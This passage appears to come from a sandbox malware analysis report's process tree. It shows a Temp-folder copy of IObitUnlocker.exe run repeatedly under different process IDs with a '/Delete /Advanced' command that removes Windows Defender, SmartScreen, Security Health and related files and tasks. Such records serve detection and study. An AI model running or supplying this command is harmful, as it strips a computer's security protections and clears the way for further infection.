Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9140
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 